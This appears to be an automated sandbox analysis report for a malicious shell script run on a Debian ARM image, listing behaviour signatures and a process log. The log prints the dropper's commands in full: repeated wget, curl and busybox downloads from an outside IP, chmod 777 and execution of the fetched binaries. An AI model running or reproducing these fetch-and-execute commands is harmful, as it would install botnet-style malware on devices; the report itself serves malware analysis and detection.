Analysis Overview
SHA256
19c1517a2ea1661dfe2ede8c05244675c15d73c99da83c28e14b099d85f9974f
Threat Level: Shows suspicious behavior
The file 19c1517a2ea1661dfe2ede8c05244675c15d73c99da83c28e14b099d85f9974f.sh was found to be: Shows suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Executes dropped EXE
Checks CPU configuration
Reads runtime system information
System Network Configuration Discovery
Writes file to tmp directory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-28 02:12
Signatures
Analysis: behavioral2
Detonation Overview
Submitted
2024-10-28 02:12
Reported
2024-10-28 02:15
Platform
debian9-armhf-20240611-en
Max time kernel
30s
Max time network
74s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ | /tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ | N/A |
| N/A | /tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7 | /tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7 | N/A |
| N/A | /tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP | /tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP | N/A |
| N/A | /tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM | /tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM | N/A |
| N/A | /tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9 | /tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9 | N/A |
| N/A | /tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W | /tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W | N/A |
| N/A | /tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p | /tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p | N/A |
| N/A | /tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm | /tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm | N/A |
| N/A | /tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5 | /tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5 | N/A |
| N/A | /tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU | /tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU | N/A |
| N/A | /tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf | /tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf | N/A |
| N/A | /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO | /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO | N/A |
| N/A | /tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm | /tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm | N/A |
| N/A | /tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX | /tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX | N/A |
| N/A | /tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W | /tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W | N/A |
| N/A | /tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9 | /tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9 | N/A |
| N/A | /tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm | /tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm | N/A |
| N/A | /tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5 | /tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5 | N/A |
| N/A | /tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU | /tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU | N/A |
| N/A | /tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf | /tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf | N/A |
| N/A | /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO | /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP | /usr/bin/curl | N/A |
| File opened for modification | /tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO | /usr/bin/curl | N/A |
| File opened for modification | /tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM | /usr/bin/curl | N/A |
| File opened for modification | /tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p | /usr/bin/curl | N/A |
| File opened for modification | /tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX | /usr/bin/curl | N/A |
| File opened for modification | /tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W | /usr/bin/curl | N/A |
| File opened for modification | /tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf | /usr/bin/curl | N/A |
| File opened for modification | /tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU | /usr/bin/curl | N/A |
| File opened for modification | /tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf | /usr/bin/curl | N/A |
| File opened for modification | /tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU | /usr/bin/curl | N/A |
| File opened for modification | /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO | /usr/bin/curl | N/A |
| File opened for modification | /tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W | /usr/bin/curl | N/A |
Processes
/tmp/19c1517a2ea1661dfe2ede8c05244675c15d73c99da83c28e14b099d85f9974f.sh
[/tmp/19c1517a2ea1661dfe2ede8c05244675c15d73c99da83c28e14b099d85f9974f.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://87.120.126.196/bins/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
/bin/chmod
[chmod 777 3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
/tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ
[./3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
/bin/rm
[rm 3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
/usr/bin/wget
[wget http://87.120.126.196/bins/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/bin/chmod
[chmod 777 gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7
[./gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/bin/rm
[rm gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/usr/bin/wget
[wget http://87.120.126.196/bins/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/bin/chmod
[chmod 777 X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP
[./X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/bin/rm
[rm X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/usr/bin/wget
[wget http://87.120.126.196/bins/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]
/bin/chmod
[chmod 777 XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]
/tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM
[./XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]
/bin/rm
[rm XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]
/usr/bin/wget
[wget http://87.120.126.196/bins/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/bin/chmod
[chmod 777 uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9
[./uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/bin/rm
[rm uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/usr/bin/wget
[wget http://87.120.126.196/bins/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/bin/chmod
[chmod 777 hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W
[./hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/bin/rm
[rm hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/usr/bin/wget
[wget http://87.120.126.196/bins/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]
/bin/chmod
[chmod 777 LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]
/tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p
[./LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]
/bin/rm
[rm LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]
/usr/bin/wget
[wget http://87.120.126.196/bins/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]
/bin/chmod
[chmod 777 WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]
/tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm
[./WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]
/bin/rm
[rm WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]
/usr/bin/wget
[wget http://87.120.126.196/bins/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]
/bin/chmod
[chmod 777 U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]
/tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5
[./U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]
/bin/rm
[rm U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]
/usr/bin/wget
[wget http://87.120.126.196/bins/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]
/bin/chmod
[chmod 777 DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]
/tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU
[./DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]
/bin/rm
[rm DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]
/usr/bin/wget
[wget http://87.120.126.196/bins/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]
/bin/chmod
[chmod 777 4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]
/tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf
[./4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]
/bin/rm
[rm 4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]
/usr/bin/wget
[wget http://87.120.126.196/bins/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]
/bin/chmod
[chmod 777 8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]
/tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO
[./8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]
/bin/rm
[rm 8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]
/usr/bin/wget
[wget http://87.120.126.196/bins/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]
/bin/chmod
[chmod 777 0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]
/tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm
[./0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]
/bin/rm
[rm 0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]
/usr/bin/wget
[wget http://87.120.126.196/bins/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]
/bin/chmod
[chmod 777 tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]
/tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX
[./tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]
/bin/rm
[rm tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]
/usr/bin/wget
[wget http://87.120.126.196/bins/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/bin/chmod
[chmod 777 hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W
[./hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/bin/rm
[rm hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/usr/bin/wget
[wget http://87.120.126.196/bins/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/bin/chmod
[chmod 777 uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9
[./uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/bin/rm
[rm uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/usr/bin/wget
[wget http://87.120.126.196/bins/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]
/bin/chmod
[chmod 777 WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]
/tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm
[./WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]
/bin/rm
[rm WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]
/usr/bin/wget
[wget http://87.120.126.196/bins/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]
/bin/chmod
[chmod 777 U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]
/tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5
[./U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]
/bin/rm
[rm U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]
/usr/bin/wget
[wget http://87.120.126.196/bins/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]
/bin/chmod
[chmod 777 DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]
/tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU
[./DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]
/bin/rm
[rm DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]
/usr/bin/wget
[wget http://87.120.126.196/bins/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]
/bin/chmod
[chmod 777 4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]
/tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf
[./4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]
/bin/rm
[rm 4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]
/usr/bin/wget
[wget http://87.120.126.196/bins/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]
/bin/chmod
[chmod 777 8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]
/tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO
[./8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]
/bin/rm
[rm 8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]
/usr/bin/wget
[wget http://87.120.126.196/bins/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]
Network
| Country | Destination | Domain | Proto |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
